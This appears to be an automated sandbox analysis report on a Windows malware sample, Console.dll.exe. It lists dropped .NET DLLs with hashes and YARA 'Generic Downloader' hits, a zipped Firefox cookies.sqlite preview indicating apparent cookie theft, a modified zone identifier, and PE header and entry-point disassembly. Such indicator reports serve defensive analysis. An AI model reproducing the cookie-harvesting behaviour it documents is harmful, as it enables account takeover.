                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):56184
                                                                                                                                                                                                                        Entropy (8bit):6.176478053101136
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:H/+4IBAKUcb+KRcuVLJq9rweB2mnzkVJorcwwMevekaHhXn80GT0g8T:m7ouR80eELVCwxmkaBXhGYxT
                                                                                                                                                                                                                        MD5:F672A537A363A4EEA79A48CF34FA5808
                                                                                                                                                                                                                        SHA1:B9101BA7E62B0116AC5A7D4064D91F684E25F233
                                                                                                                                                                                                                        SHA-256:B0B15EE123D24A220DC3446C96A6273E2FDADE71D1F352BF06217BDE57778B24
                                                                                                                                                                                                                        SHA-512:4ED8FB355723824C6E608B38D397C215142D508C80E5000DF854200DE8F89B44EB4AFE5829EA40F7706A6149527DBD8C748FF3AF9172D9A20B24958DD94E6484
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.713334638039652
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:yUnaHtExAZgWuSWiIuWXebPpUNTQHnhWgN7acW/alyttuX01k9z3AWPoD9mGH:VaHtSQgWuSWiITb2HRN7Y9SR9zdPaFH
                                                                                                                                                                                                                        MD5:221D6DD5F1237CD247684CE8684547A3
                                                                                                                                                                                                                        SHA1:16F84A2CD719223A44B18A08761053887394B270
                                                                                                                                                                                                                        SHA-256:909AAF202BC5E504A5CE361EB6981073673037EE0A4273C166517DB6D56CD9E5
                                                                                                                                                                                                                        SHA-512:B66DDE626855E916AFE89320653745C651E673263B58BB3B93D2790691CC504F88053DA70216840CE11FAECCBB88EA2E180FB31BA33A68CA1F9BFFA7F509F0EA
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.697316901876271
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:Asjc16T2BWx4WituWXebPpUNTQHnhWgN7acW1DYxNVAv+cQ0GX01k9z3ApyBE4n9:GDWx4WitTb2HRN7K8xNbZR9z3E4nWyN
                                                                                                                                                                                                                        MD5:C7324A1B65D79D69FF350FF9889BC3EE
                                                                                                                                                                                                                        SHA1:33CCD1C7BADCFB72F547B595F1AEA19688D69E55
                                                                                                                                                                                                                        SHA-256:C574D36ACCC9935DE551E988655EEAE702418A6E2CE4C9F003745CF5522AA8D0
                                                                                                                                                                                                                        SHA-512:BF10CFE54A99FF1229DB40433A534B568E3D6F8157CB986AE1B016253761D41485430DB9454F4DFC3EE2622B367AE81FDE76A501C6E37249E901576268363B0A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):22192
                                                                                                                                                                                                                        Entropy (8bit):6.354869908401043
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:B1G5qkxK67ex4FCu1qWJAWi15kHRN7uHR9zkZqZd9Q:n6LdL9s9z6qZd9Q
                                                                                                                                                                                                                        MD5:0845E81793B8FE161B5E1BB06BEE3822
                                                                                                                                                                                                                        SHA1:2584632D78896AD4C22B1323DC421B5CEA8DB13F
                                                                                                                                                                                                                        SHA-256:46E0CEA3590B11AE2DE9C60D4DE0DF409CB92F95E30EC06A5938F78071D3AA20
                                                                                                                                                                                                                        SHA-512:06948058E11A770CEDE36BD850E5AD441F398A1ECA0CD875A3CF8A5488A7A57B3745C09345665A59FE7C464C5C3D8F0AFFAD2836EB4C295A98DAE673D23FA645
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16544
                                                                                                                                                                                                                        Entropy (8bit):6.621122049886203
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:E0YLW7fEqHWiqTb2HRN7J/6fR9zjglS1w:E0YkfEqG/iq9zfW
                                                                                                                                                                                                                        MD5:A2291DC87F8D68DEA872223F3F38CE7E
                                                                                                                                                                                                                        SHA1:052E5E1B7CC51CDA42B91E692996BCAB36DD9598
                                                                                                                                                                                                                        SHA-256:8517BAAF737BF94BA0B2318864D943B7984DD3C98138F89F4D43463865BAFB00
                                                                                                                                                                                                                        SHA-512:AFF341F5438D8BA135BF808A0DA0896C2D54B534AA2BB168A48717C079A13D6FE92299A8D2CA800BFCF4BB6AC2D1FE358219941640BCA8863CBCA6F6DE5188B6
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16048
                                                                                                                                                                                                                        Entropy (8bit):6.757688283492204
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:DLNzcxxWrIdWir93WT56Os1HnhWgN7aIWfaxQKrHbTseUfX01k9z3AcgkSKnU:DBWxWcdWik5kHRN7uKz/6fR9zjggU
                                                                                                                                                                                                                        MD5:CD012C0AEB66F1792AEAC74A3FF80683
                                                                                                                                                                                                                        SHA1:FCD63045B77122254AAB624A459EB2890F6CF467
                                                                                                                                                                                                                        SHA-256:CCA08E2D6C314DC026E04CD5E6909CF10CA5C320481447B9B905744B9BAE394D
                                                                                                                                                                                                                        SHA-512:10AD5FAD33C6F5743F70FB621AC4C9883FB89D2BE62E962EF4AA04ED2D272A548AA944848422881548AA26DC42A86FE9E1654784263325155B562F71D5169383
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):30880
                                                                                                                                                                                                                        Entropy (8bit):4.256936828210995
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:X+WieWiiUVDJZuzQxgPuWXebPpUNTQHnhWgN7aIWT8KIjwX01k9z3ADZ7U1dPB:X+WieWiiFKgPTb2HRN7mJHR9zkZMdPB
                                                                                                                                                                                                                        MD5:8C60A6C28353AB7AD8234044C232556B
                                                                                                                                                                                                                        SHA1:2C95A797F01C1F7390D288FC7C9A38CA247F73AA
                                                                                                                                                                                                                        SHA-256:C5AC54C1960E68DB6B80FDB9BE69AE5D1AC2A027B0C006F8DA471E0ED5B61E0D
                                                                                                                                                                                                                        SHA-512:CD1FAEC38C8AD6CE991E2939EDD1729D4B0B9E0EDCB8186D64111D72FB97392495DD7AA316D7746A6F658F239FF42893CA7534244BFC2B9653B12B77B0D7BA06
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16160
                                                                                                                                                                                                                        Entropy (8bit):6.73184648753224
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:1CA6iAvxWIvWiBA5kHRN7ckXC4deR9zZjmNEr0z:RsvNFVckXC4dC9zZjyNz
                                                                                                                                                                                                                        MD5:CEBE1A4A8B9AC3B59C42566109EE849B
                                                                                                                                                                                                                        SHA1:06D375D8F1F94A4589A32163C06B847220E05CB5
                                                                                                                                                                                                                        SHA-256:88E5E770CE5886C10315FEA63CBCF6F0CEEEF0149B8D2BA279FEE7B01EF33F74
                                                                                                                                                                                                                        SHA-512:5AE647B8D728E6ECE451CF3C9F16A2F7744B1BF4D0EBB03F17371564202DF3DA125D76F111BC7F6F6448FD06FE955D9B06E4B46CF4C89BF5D1E6A465FF7A4124
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16136
                                                                                                                                                                                                                        Entropy (8bit):6.758774850355361
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:BYlxlVxAdUc14WA1nPUWiOuWXebPpUNTQHnhWgN7acWX0YyttuX01k9z3AWPoD9H:6TfodiWmsWiOTb2HRN7jSR9zdPah
                                                                                                                                                                                                                        MD5:9E484CD164107ECE293EA413787796C7
                                                                                                                                                                                                                        SHA1:A8BB43C0AC577A1543E33B61FE5BC067100C9037
                                                                                                                                                                                                                        SHA-256:67E23C0806076A00C00525B29DBA53208717B15B157025E3AE6E3CDEF1AD6BB4
                                                                                                                                                                                                                        SHA-512:521C0FD08631C782080DCDF22B8830A226C09B881BB4B96FFC64D32879C8BF5B4666FB661639645D25BB81D1CF330660077471D732C5B4D31E6CB0E8E3473D5A
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):18184
                                                                                                                                                                                                                        Entropy (8bit):6.625487203475341
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:rw3anBNTXxz+WAvWi6uWXebPpUNTQHnhWgN7acWCKDUX01k9z3AeEh:M3afBCWAvWi6Tb2HRN7BpR9zNW
                                                                                                                                                                                                                        MD5:7FEC2CB54AC56E0FE3D8BCC93D151E64
                                                                                                                                                                                                                        SHA1:B49EAF45EB6D12436A694C61050CBCE2EAB68613
                                                                                                                                                                                                                        SHA-256:0093AB9076C483398D0A0D7CBAA454F5BA3B677DC7C03C269056653DBE9A31A3
                                                                                                                                                                                                                        SHA-512:06408E3290308A2455013ED14D2F561FAA0F8F63863FBE96FDE20CCF6D2B1D858E06B99DAB699EBB18E4E484D16AAC20CD55A599931B69D221AC317582FD8D3F
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):23816
                                                                                                                                                                                                                        Entropy (8bit):6.28194581000974
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:384:p58Ieq5ufyw8bcB8yG5sW+jsWit9Tb2HRN732p0SR9zdPaYc:p58IeWvAW9/iw0e9zBHc
                                                                                                                                                                                                                        MD5:41D47C1949D1CC781FE749FEB258F898
                                                                                                                                                                                                                        SHA1:7F889BD6B11F8C2092A4259E35B67FF332EF96FB
                                                                                                                                                                                                                        SHA-256:48822FF78B7D2CE06B76EBA6100CA546AF00C7004CCE325BC12385806F731A0C
                                                                                                                                                                                                                        SHA-512:F85614F02C303CFAC46111F98BB14516C048FC22C0F65D8700A8FC094808B5499A156C4515ADB249003781BDA07BA603FAD7B518887FD7C89E8829F841F2657C
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):50336
                                                                                                                                                                                                                        Entropy (8bit):5.746059228199323
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:768:JRlKhT46UA2Zi5wRNH5JVb0U502zq1TntuIB3/iKq9z3:Tu6Zi5i5jzCkINiKWz3
                                                                                                                                                                                                                        MD5:34E70D627DC45537F82D5BFA7D23350F
                                                                                                                                                                                                                        SHA1:D8A17E848188290365003938C2AB4D4597FD0DB4
                                                                                                                                                                                                                        SHA-256:D2470B1ADBF77789919DC9525203E32AB78551B6DAE8B8A8C620E68FA6579C99
                                                                                                                                                                                                                        SHA-512:F364F0A7CD5DE84DAA7845343D64D9EC70D499B68268EE887F701DF2D5FA15C223B158E055C0674D747502EFD880318AC5AE23CC3B3291A1FF3358D47EEAD5D3
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dll, Author: Joe Security
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):64000
                                                                                                                                                                                                                        Entropy (8bit):5.8888244673369075
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:MoNIglS4xUF/NWN2MPilIlLIoSBlNcIguQM1:MMIh4yNlINIoSWIguV
                                                                                                                                                                                                                        MD5:4CE1BFB17E847FEB3E7ECF1CC33DF731
                                                                                                                                                                                                                        SHA1:3E48D0F7F5CD8A618D2F32C6AA08CFF0C3C61C49
                                                                                                                                                                                                                        SHA-256:BBAF622CC3F4B512C6C131AB7CCAD2DB6B0662C03367AFC10F1AAB3DEFF5EFCB
                                                                                                                                                                                                                        SHA-512:1E2723F0C10720D0491E0EFE1ED7D123DB94AE8EAA8F3C82771502BB10FD0392096578AE360CA308735CE319D37EFEAD6713D12C8B24CB8209280F5E470C5DA8
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):16648
                                                                                                                                                                                                                        Entropy (8bit):6.718860348929332
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:192:+yCmaITFWQlMXD2EgWtcWiZuWXebPpUNTQHnhWgN7acW3+yttuX01k9z3AWPoD90:pasFWQFWtcWiZTb2HRN7S/SR9zdPaPu
                                                                                                                                                                                                                        MD5:4A8C708988250C39E6F24D84EB8A2768
                                                                                                                                                                                                                        SHA1:C7993AF266A660576B1934BF8A9ACE287A969C97
                                                                                                                                                                                                                        SHA-256:CCC047A00465ED02571D58448BD9DAF4FE477BA73251632352347940995C9D3E
                                                                                                                                                                                                                        SHA-512:2356858091F449E63E9A72520D9D93E9146E605EDED39BFAA1D1C3239E9C28D54CB78B29A04F332A93088302CAC0AE7A55F0014421CDA2A5D0FD43EBD2B306B3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):59664
                                                                                                                                                                                                                        Entropy (8bit):5.646827579317504
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:itFcC3ZcYf5o4bZyGc1A4c4biIC4dezJN8:itOcZcYi4b8lptIL8
                                                                                                                                                                                                                        MD5:5D78956E375E7BF40CE3787C36EC20A3
                                                                                                                                                                                                                        SHA1:3219234855A038E9E54F7A7502C2E9C7A8158E32
                                                                                                                                                                                                                        SHA-256:7D6584D35824B681524A80BE15DECCC08FD5B35BE182CAEF479B1E9E71168966
                                                                                                                                                                                                                        SHA-512:95A9E005CB2AF1EEFE3560BFBDE5CF1C2C49AB83FC83F652C7E1C499448A12CD3D1DB9787963C5B1D58F0A4209ADA8F964E4FEC2B085CB3F46039F6B3FC2D9D3
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):101136
                                                                                                                                                                                                                        Entropy (8bit):5.502704018826745
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1536:uYsYXj0p2NYq5V4bgDHsPdIpuSE5L3Ukcz9wmS0irC4dezJp:jMkYe4bgDUAxCmSJI/
                                                                                                                                                                                                                        MD5:449D3EC3245F31F93C881F333D3E4370
                                                                                                                                                                                                                        SHA1:D362A8078972C5D2904E8C90CC43C892A420C545
                                                                                                                                                                                                                        SHA-256:EBCF557A761091F253CF0BF8B33C928C94EE5C8B6DCF086ADDDD685D19A63653
                                                                                                                                                                                                                        SHA-512:A364C91828FC252A734257C77F346ED50897F218C3B579201D634809575FDFF81C6B7028D67DFA21A040C5C4C2FC73CD6F20820EA25CB0FA3987DA26A08901B8
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dll, Author: Joe Security
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):136488
                                                                                                                                                                                                                        Entropy (8bit):6.734245647987289
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:H3SGhrfrdqCn3bctzdGRX18u5e++dowahamD5/f+vHPoW:H3SGhbBqCnmzERyiepSUm9moW
                                                                                                                                                                                                                        MD5:C62A83F20BC23AEFACE70EC13003C4C5
                                                                                                                                                                                                                        SHA1:35553CFCDCBECCDC49710E68AEC495C16880F0BD
                                                                                                                                                                                                                        SHA-256:1446D6B26DA49A5A9F366972F89F4E236F916955F31DDC38EBB96217C1CACE9C
                                                                                                                                                                                                                        SHA-512:4DDA44FD5B538F5DA9E8CB46A3AB1BDC14B43425B9A61249ECCC925D986AF7B8B3548DB9490238F14807909ECF479415117141DDB344119438A59F97E894EA37
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):226816
                                                                                                                                                                                                                        Entropy (8bit):5.8043063296433735
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3072:HHOD3s/RCKVA0RZg3WfWreo10EHwtAmPWaJNCKLLXKMWwNI58MBTJkajsNlVU1sU:Ks/TVlZgGXo2EHwoV8MJJ5NQZSJgI
                                                                                                                                                                                                                        MD5:169D5BAE15E2C6DC13386A8AA34CE367
                                                                                                                                                                                                                        SHA1:FA2F5085473304191A4684DA5B38935105906178
                                                                                                                                                                                                                        SHA-256:339C740207F308D9E86B03A4D45D29F17C52476D1ECDA88AFA9F607966D226FC
                                                                                                                                                                                                                        SHA-512:F28381088FE3BE65570E3E2E2A0C07632BC05416F53058C7125D3F02D44063BD56A5544E0076A38E278A955A4F3BC26BA49CD46333F7A58C96005EAFE6234970
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):77426070
                                                                                                                                                                                                                        Entropy (8bit):6.781006665108723
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:1572864:l3a4EjQOm/lQqYrsUDOsPbOLcD1UW+hdYzXe:l3WjfOOysCe4
                                                                                                                                                                                                                        MD5:3DABBDB09892B980B8B48DEEEC718E63
                                                                                                                                                                                                                        SHA1:2C8B8F1C993C37FA8464CBF81E787FB1BDA5ABC1
                                                                                                                                                                                                                        SHA-256:A3229A8A550CD643FD7B33C1265CA01B22370129D7374A099A3AC343C0E5BF3A
                                                                                                                                                                                                                        SHA-512:96B6F9C088A36633CA11E445C7A978A760A0A573FE71F6BFF049BFDCDE1F9F40496763A74DA41B25CB3A7699A80D8BC169C9B9875612AA1E1357960D0BAF9EEF
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                        Size (bytes):26
                                                                                                                                                                                                                        Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                        Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\Console.dll.exe
                                                                                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                        Size (bytes):702
                                                                                                                                                                                                                        Entropy (8bit):6.626732290929846
                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                        SSDEEP:12:5j6KI8WlzVNlxrovvAR0D4uZV7TL+fdH69iDcHKIKWla0:9hAlzNxrYAC1ZVHw64YqvG
                                                                                                                                                                                                                        MD5:C41896CC51E2156572BA3B5BEABE06DE
                                                                                                                                                                                                                        SHA1:7BFC06FC7D19D302CFB6F7E5040F3A0D3A18A018
                                                                                                                                                                                                                        SHA-256:9D80BA44FE55289DF10A4F8AF7AC26E88F0CA8DF04218F5C3032111CCA754F55
                                                                                                                                                                                                                        SHA-512:126DA789198F0420AA0B8DF5F5CB9ECC63607E9C9AB877A5C5E947468725124EECA0B04A62CE75ECF2CB50BA8CE294A1285A4E10B579D7D47CFC306C1AAADEED
                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                        Preview:PK........-.EW~.3.........'...fu7wner3.default-release\cookies.sqlite..M..@...+*....A.".x..Q...~...X...6.$.......?.x.h...U......f..&o.L...Y...y..T.j..5.....(Z;h..u;......8k.....5.}..}y.............................................J.O....$._di.2l....Q.F..n.V..B.$tz..v<....{...p7~..y.=.f.*....9...B._.q..n....(.?...d'.....d.8.o.eu0.'...0}=.7..l.iRV..$-..(.V..iRe.l..G..f.0.,..V.T.?.....6..U..q].tV...a.[..S.fUz\.H^....'......q....p4h..*/f..".K<.u...paY...^._.|......F#.fO.....c+YT..|k..m]Y...w...B.[v{~@................................og......................................oPK..........-.EW~.3.........'.................fu7wner3.default-release\cookies.sqlitePK..........U...S.....
                                                                                                                                                                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                        Entropy (8bit):6.781006665108723
                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                                                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                        File name:Console.dll.exe
                                                                                                                                                                                                                        File size:77'426'070 bytes
                                                                                                                                                                                                                        MD5:3dabbdb09892b980b8b48deeec718e63
                                                                                                                                                                                                                        SHA1:2c8b8f1c993c37fa8464cbf81e787fb1bda5abc1
                                                                                                                                                                                                                        SHA256:a3229a8a550cd643fd7b33c1265ca01b22370129d7374a099a3ac343c0e5bf3a
                                                                                                                                                                                                                        SHA512:96b6f9c088a36633ca11e445c7a978a760a0a573fe71f6bff049bfdcde1f9f40496763a74da41b25cb3a7699a80d8bc169c9b9875612aa1e1357960d0baf9eef
                                                                                                                                                                                                                        SSDEEP:1572864:l3a4EjQOm/lQqYrsUDOsPbOLcD1UW+hdYzXe:l3WjfOOysCe4
                                                                                                                                                                                                                        TLSH:F408BF11B3D88A36E5AF067580B6E655C3BDE9161335EBCF2648F69818723D18D323E3
                                                                                                                                                                                                                        Icon Hash:033fcd73732c273e
                                                                                                                                                                                                                        Entrypoint:0x8ebeb0
                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                        Time Stamp:0x65F9E8FC [Tue Mar 19 19:35:24 2024 UTC]
                                                                                                                                                                                                                        TLS Callbacks:0x8eb3e0, 0x8ebb60
                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                        OS Version Major:6
                                                                                                                                                                                                                        OS Version Minor:0
                                                                                                                                                                                                                        File Version Major:6
                                                                                                                                                                                                                        File Version Minor:0
                                                                                                                                                                                                                        Subsystem Version Major:6
                                                                                                                                                                                                                        Subsystem Version Minor:0
                                                                                                                                                                                                                        Import Hash:aa9f3a2087e12b9bb85387e33424b173
                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                        call 00007F740CB3F05Bh
                                                                                                                                                                                                                        jmp 00007F740CB3EA0Dh
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        push FFFFFFFFh
                                                                                                                                                                                                                        push 0093C3B9h
                                                                                                                                                                                                                        mov eax, dword ptr fs:[00000000h]
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        push ecx
                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                        push esi
                                                                                                                                                                                                                        push edi
                                                                                                                                                                                                                        mov eax, dword ptr [00A77040h]
                                                                                                                                                                                                                        xor eax, ebp
                                                                                                                                                                                                                        push eax
                                                                                                                                                                                                                        lea eax, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], eax
                                                                                                                                                                                                                        mov dword ptr [ebp-10h], esp
                                                                                                                                                                                                                        push dword ptr [ebp+08h]
                                                                                                                                                                                                                        and dword ptr [ebp-04h], 00000000h
                                                                                                                                                                                                                        call 00007F740C8A8956h
                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                        jmp 00007F740CB3EBAAh
                                                                                                                                                                                                                        mov eax, 008EBEF8h
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                        mov ecx, dword ptr [ebp-0Ch]
                                                                                                                                                                                                                        mov dword ptr fs:[00000000h], ecx
                                                                                                                                                                                                                        pop ecx
                                                                                                                                                                                                                        pop edi
                                                                                                                                                                                                                        pop esi
                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                        leave
                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        push ebp
                                                                                                                                                                                                                        mov ebp, esp
                                                                                                                                                                                                                        pop ebp
                                                                                                                                                                                                                        jmp 00007F740CB3EB47h
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                        int3
